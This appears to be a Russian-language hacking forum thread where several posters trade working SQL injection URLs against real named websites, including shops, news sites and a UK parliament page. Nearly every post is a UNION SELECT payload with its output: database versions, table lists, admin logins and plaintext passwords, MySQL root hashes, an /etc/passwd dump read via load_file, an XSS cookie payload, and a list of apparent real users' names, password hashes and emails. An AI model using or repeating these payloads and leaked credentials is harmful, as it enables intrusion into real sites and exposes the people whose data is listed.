скуль: Code: _http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,3,4-- потом узнаем версию: Code: _http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,version(),4-- список таблиц: Code: _http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,table_name,4+from+information_schema.tables-- Список столбцов: Code: _http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,COLUMN_NAME,4+from+information_schema.columns-- имя юзера и пароль: Code: _http://www.vertolet.kiev.ua/content.php?id=-32+union+select+1,2,username,pass+from+users-- ВОТ: имя - admin , пароль - drserver000
2 satana8920 http://www.gellastudio.ru/shop/index.php?page=viewproduct&id=4+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13+LIMIT+1,1-- Database Version: 5.0.67-log Database name: u64588 User name: [email protected] Os : unknown-freebsd6.2 http://www.gellastudio.ru/shop/index.php?page=viewproduct&id=4+UNION+SELECT+1,2,3,concat_ws(0x3a,User_id,User_Login_Name,User_Password),5,6,7,8,9,10,11,12,13+FROM+tbl_Users+LIMIT+1,1-- 1:admin:wrucrest 2:tvar:61sz21 3:squo:karina etc..
http://www.vetlabassoc.com/display.php?id=-7+union+select+1,2,3,version(),5/* 4.0.27-log вывод в картинке http://www.howcheng.com/sillystuff/display.php?id=17/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/LIMIT/**/1,1/* Database Version: 4.0.27-max-log Database name: db96095051 User name: [email protected]
https://www.mls-law.de/shop/index.php?include=11&id=20+union+select+1,concat(id,0x3a,email,0x3a,admin,0x3a,address),3+from+user/* Database Version: 4.0.27-standard-log Database name: db224505621 User name: [email protected] че то меня на немецкие шопы потянуло =)
1 Code: http://egechita.ru/news/show_news.php?id_news=-39+union+select+1,2,3,4,5-- 2 Code: http://egechita.ru/news/show_news.php?id_news=-39+union+select+1,version(),3,4,5-- 3 Code: http://egechita.ru/news/show_news.php?id_news=-39+union+select+1,concat_ws(0x20,user,password),3,4,5+from+mysql.user-- root 3c09b7d551df88a5 это MySQL хэш!
[PR = 6][SQL - 5] Code: http://lifepeeragesact.parliament.uk/lifePeeragesAct/detail.php?id=164+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38-- [PR = 4][SQL - 5] Code: http://faroutshirts.com/detail.php?id=289+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
http://www.mega-poker.net/comments.php?id=5+and+1=0+union+select+1,2,concat_ws%280x3a,user_id,0x3a,username,0x3a,user_password%29,4,5,6+from+megaforum.forum_users-- http://speakercitysoftball.com/news.php?type=story&id=-18 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+users-- http://www.sugababes.com/news-detail.php?id=-1+union+all+select+username,user_password,3,4+from+phpbb_users+where+user_id=2 http://www.libross.com/pub/contenido.php?ID=-9999+union+all+select+1,2,3,concat(username,char(58),password)+from+users-- ======================= Code: shttp://www.phpstreet.com/winxp.php?id=-1%20union%20all%20select%201,@@version,3%20-- ===================== http://www.controlledlabs.com/product_desc.php?id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(id,0x3a,username,0x3a,password),18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+admin-- А вот так вот хранятся бекапы) http://www.controlledlabs.com/catalog/admin/backups/ ====================== http://www.champion-evreux.fr/produit.php?id=-1+union+select+all+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44-- http://www.boero-france.com/fr/produit.php?id=-1+union+select+all+1,2,3,4,unhex(hex(concat_ws(0x3a,version(),user(),database()))),6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- ======================= http://www.hostinglook.com/directory.php?ax=list&sub=7&cat_id=directory.php?ax=list&sub=7&cat_id=-1%20union%20select%201,2,concat(id,0x3a,name,0x3a,email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14%20from%20links-- http://www.tni.org/detail_pub.phtml?&&&know_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,(SELECT+group_concat(user,0x3a,password,0x3a,userid,0x3a,groupid,0x3a,fullname,0x3a,iv,0x3a,workgroups)+FROM+user),51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68-- http://www.fiercekitten.com/blog/news.php?id=196+and+0=1+union+select+0,1,2,group_concat(username,0x3a,password),4,5,6+from+as_users-- http://www.miromar.com/news.php?id=20+and+0=1+union+select+0,group_concat(user_username,0x3a,user_password),2+from+wma_users-- http://www.rockforlife.org/article.php?id=-10253%20union%20select%201,%20group_concat(user,0x3a,pass,0x3a,email,0x3a,status,0x3a,lastlogin),3,4,5,6,7,8,9,10,11,12,13,14+from+login-- http://www.jumbuck.com/support/default.php?productid=19+and+0=1+union+select+0,1,group_concat(vchusername,0x3a,vchpassword),3,4+from+tblAdmin ========================= Code: http://www.gamer.tm/news.php?id=-1848+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(blg_username,0x3a,blg_password),14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+FROM+staff/* Code: http://www.ctpetguide.com/profile.php?id=-8/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,username,passw ord),15,16,17+from+users/* ====================== Code: http://www.thenakedtruthproject.org/product.details.php?product_id=82+and+1=0+union+select+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18+from+mysql.user-- Небольшая пьеса в трех действиях: Нумер рас - включаем интернета кусок и заходим на рандомный сайт, например на этот: http://www.hkdailynews.com.hk/ После недолгих размышлений руки нас привели: http://www.hkdailynews.com.hk/world.php?id=-18441/**/union/**/select/**/0,version(),2,3 Смотрим вер: и поражаемся мысли удрученного админа. Занавес. Антракт. Нумер два - начинается отаке. Code: http://www.hkdailynews.com.hk/world.php?id=-18441/**/union/**/select/**/0,concat(user(),0x2f,database(),0x2f,version()),null,3 Где на сцене видим Потом собираем Code: cxholidays information_schema mysql news_database test webcal Выдергиваем: Code: admin -- f17b3fd9fac71f025a5787dd6ef1259a (insidepro.com = cxww) Нумер три - отаке продолжается. В мускуле: Code: *EE30ECF7B15114D19DF0460E2573ECC376217E81 / root news_databeses: Code: admin / b0baee9d279d34fa1dfd71aadb908c3f (local database = 11111) И оп-оп Code: http://www.hkdailynews.com.hk/world.php?id=-18441/**/union/**/select/**/0,load_file(%27/etc/passwd%27),null,3-- Парам: Code: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin dom:x:1000:1000:Dominie Liang,,,:/home/dom:/bin/bash benny:x:1001:1001:,,,:/home/benny:/bin/bash bind:x:105:113::/var/cache/bind:/bin/false mysql:x:106:114:MySQL Server,,,:/var/lib/mysql:/bin/false smmta:x:107:115:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:108:116:Mail Submission Program,,,:/var/lib/sendmail:/bin/false hong:x:1002:1002:,,,:/home/hong:/bin/bash osd:x:1003:100:osd:/home/osd: ckli:x:1004:1003:,,,:/home/ckli:/bin/bash waihongchan:x:1005:1004:,,,:/home/waihongchan:/bin/bash Не курите дети тесто, оно тоже хочет жить. ============================== Code: http://www.atohm.com/kit_rafalev60.php?id_kit=-1%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,concat(login,0x3a,pass),13%20from%20_user-- Code: http://www.omct.org/index.php?id=&lang=eng&articleSet=Documents&articleId=7253+AND+1=0+UNION+SELECT+ALL+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20users-- ============================== Code: http://www.singup.org/songbank/song.php?id=90+union+all+select+group_concat(user_name,0x3a,user_pass,0x3a,user_email),2%20from%20admin_user-- singup_live,songbank_live songbank_live: Code: accompaniment,admin_user,admin_user_group,admin_user_level,album,cc_links confidence,establishment,establishment_favs,event,event_type,keystage,menum usical_element,pagegroup,pages,pdf,related_link,related_song,song,song_accompaniment song_keystage,song_menu,song_musical_element,song_style,song_writer,song_year_group song_yeargroup,songban admin_user: Code: user_id,user_group_id,user_name,user_pass,user_email,user_level_id singup_live: Code: agegroups,altformats,boroughs,cdrom08,comments,contactchannels,dumprecord,emailalerts,emailformat,emailnational,emailtype,employment,ethnicityid,experience,gender,hasdisability,howdidyou,regions,registration,role,sectors,themes,title,workarea HTML: Bethan Millett:f89fc89c7fe02e36926c952a2ff13b84:[email protected],Celi Barberia:d9779869efc20f3cfaa5d1139e27c226:[email protected],Gerard Luskin:c49c07d984ac12da7dd384aa30819db7:[email protected],Henry Horton:b9e28e42fc461436c8068ce96e6b9fc6:[email protected],Uchenna Ngwe:30ee163acd6c624167ab626b26246228:[email protected],Madeleine York:40d00f79d46311a349bcdb06fb56d0f7:[email protected],Delbar Moinian:6b6e6254f9b8610adf340b39166b8bb3:[email protected],Baz Chapman:bafb68a4933f45527c516695d65a7eff:[email protected],Erin Mell-Taylor:235133a853db99a075249fc83e38d7c6:[email protected],Diana North:a4a50d83a373dab656c714757d3b9f76:[email protected],Henry Bird:b9210054c9858597fab430bc9ef54f64:[email protected] ========================== Code: http://vladenie.ru/search.php?id=382+and+0+union+select+0,1,2,3,4,5,6,7,8,9,concat_ws(char(58),user,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+mysql.user+limit+0,1&cl=6&fromp=1&subtype=0 root:0e6b82290c5ebcf5
http://www.pshsoft.net/pshsoft/en/product.php?id=10001/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/**/LIMIT/**/1,1/* Database Version: 4.0.27-max-log Database name: db188349573 User name: [email protected] есть users id: password:username ---> 1:Zy$xAC@;:mamu хто админку найдеть напишите в личку ща впадлу искать http://www.renome.biz/product.php?id=37&pid=4/**/UNION/**/SELECT/**/1,2,3/**/LIMIT/**/1,1/* Database Version: 4.1.22-standard Database name: renome_renome User name: renome_user@localhost
Суши-таун ^^ Code: http://www.sushi-town.ru/?page=catalog&goods=2+and+1=0+union+SELECT+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user--&num=0
Database Version: 4.1.22-log http://art.rin.ru/cgi-bin/index.pl?id=94&art=2001+union+select+1,2,concat(user,0x3a,password,0x3a,host),4+from+mysql.user-- http://art.rin.ru/cgi-bin/index.pl?id=94&art=2001+union+select+1,2,login,pass+from+admins-- http://art.rin.ru/cgi-bin/index.pl?id=94&art=2001+union+select+1,2,'<script>alert(document.cookie)</script>',4-- SIXSS
http://pool.veoo.de/bilder/show.php?id=2'+union+select+1-- Database Version: 5.0.32-Debian_7etch8 Database name: DB14850 User name: DB14850@localhost http://www.psychoambulanz.de/forum_free/show.php?forum=500&id=-230+1,2,3,4,5,6,7,8-- Database Version: 4.0.27-log Database name: DB30543 User name: [email protected] http://www.fra35.de/fotoalbum/show.php?id=-822+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- Database Version: 5.0.51a-3ubuntu5.4 Database name: fra35db User name: fra35dbuser@localhost http://www.absolutemusic.co.uk/shop/index.php?cat_id=497+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- Database Version: 4.1.22-standard Database name: absolute_ User name: absolute@localhost http://www.berryscrumptious.co.uk/shop/index.php?cat=1+union+select+1-- Database Version: 5.0.67-community Database name: berryscr_shop User name: berryscr_shop@localhost PS чуть чуть Немцы и Англичане
Code: http://www.henleystandardtoday.co.uk/food/food.php?id=1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10 hsta@localhost:henleystanda:5.0.45
<<Все о кино>> Code: http://films.h16.ru/main.php?ttt=-15+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* db: 4.0.27 name_db: films6 user: [email protected] os ortbld-freebsd6.4
Code: http://www.russonsrestaurant.co.uk/food.php?&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4 [email protected]:russons:4.1.22-log
A SIPT прикольная штука =) Code: http://www.killarney.ie/food.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 Database Version: 5.0.45-community-log Database name: splashg_konline User name: [email protected] Tables: Code: Database [splashg_konline] Table [anouncements] Table [attractions] Table [bandb] Table [boat] Table [calendar_list] Table [camping] Table [club] Table [club_subcat] Table [coach_tour] Table [comm_news] Table [council_news] Table [council_pdf] Table [council_services] Table [dining] Table [fishing] Table [gallery] Table [gallery_cat] Table [gateway] Table [golfing] Table [guesthouse] Table [homepagecms] Table [horse] Table [hostel] Table [hotels] Table [jcars] Table [mail_list] Table [news_list] Table [non_members] Table [offers] Table [other] Table [other_accom] Table [other_subcat] Table [publication] Table [publications] Table [radio_news] Table [school] Table [search] Table [self_catering] Table [shop] Table [shop_subcat] Table [sights] Table [ssp_account] Table [ssp_albums] Table [ssp_dynamic] Table [ssp_dynamic_links] Table [ssp_images] Table [ssp_slideshows] Table [ssp_usrs] Table [subpagecms] Table [tourist] Table [tours] Table [twin_town] Table [walking]
http://www.klima-ueberraschung.de/show.php?id=14+1,2,3,4,5,6-- Database Version: 4.0.27-standard-log Database name: db223113601 User name: [email protected] http://www.klima-ueberraschung.de/admin/ админка кто найдет какие нито таблицы отпишитесь плизз яяя зер ГУТ )) mailbrush оо еще какая прикольная
Code: http://www.country-tours.com/food.php?ID_CAT=10&ID_SUBCAT=0&ID=24+union+select+1,2,3,4,5,6,7,8 Database Version: 5.0.67 Database name: 202_country-tours User name: 202_cn@localhost Tables: Code: Database [202_country-tours] Table [ACC] Table [ADMIN] Table [AUTO_SERVICE] Table [CATEGORIA_CUSTOMIZED] Table [CATEGORIA_FOOD] Table [CATEGORIA_GUESTBOOK] Table [CATEGORIA_TOUR] Table [CONTENUTI_ACC_ENG] Table [CONTENUTI_ACC_ITA] Table [CONTENUTI_CUSTOMIZED_ENG] Table [CONTENUTI_CUSTOMIZED_ITA] Table [CONTENUTI_FOOD_ENG] Table [CONTENUTI_FOOD_ITA] Table [CONTENUTI_NEWS_ENG] Table [CONTENUTI_NEWS_ITA] Table [CONTENUTI_TOUR_ENG] Table [CONTENUTI_TOUR_ITA] Table [CUSTOMIZED] Table [CUSTOM_TOUR] Table [FOOD] Table [FOTO_CONTENUTI_ACC_ENG] Table [FOTO_CONTENUTI_ACC_ITA] Table [FOTO_CONTENUTI_CUSTOMIZED_ENG] Table [FOTO_CONTENUTI_CUSTOMIZED_ITA] Table [FOTO_CONTENUTI_FOOD_ENG] Table [FOTO_CONTENUTI_FOOD_ITA] Table [FOTO_CONTENUTI_NEWS_ENG] Table [FOTO_CONTENUTI_NEWS_ITA] Table [FOTO_CONTENUTI_TOUR_ENG] Table [FOTO_CONTENUTI_TOUR_ITA] Table [GUESTBOOK_ENG] Table [GUESTBOOK_ITA] Table [LINKS] Table [LUOGHI_SERVICE] Table [NEWS] Table [PHOTOGALLERY] Table [PHOTO_PHOTOGALLERY] Table [REGIONI] Table [SOTTOCATEGORIA_FOOD] Table [SOTTOCATEGORIA_TOUR] Table [TOUR] Table [TRATTA_SERVICE]
<<Рестораны мексиканская кухня>> Code: http://spb-tour.com/ViewRestaurant.php?Id=-14'+union+select+1,2,3,4,table_name,6,7+from+information_schema.columns+where+column_name+like+'password'+limit+1,1--+ db: 5.0.45 name_db: galina_spbt user: galina_spbt@localhost os: unknown-freebsd6.2 --------------------------------- http://spb-tour.com/robots.txt Code: User-Agent: Disallow: /1/ Disallow: /admin/ Disallow: /html/ Disallow: /Forum.php --------------------------------- http://spb-tour.com/admin админка с бейсик авторизацией table: users db: galina_spbt log: eva pass: eva +limit+х,х--+
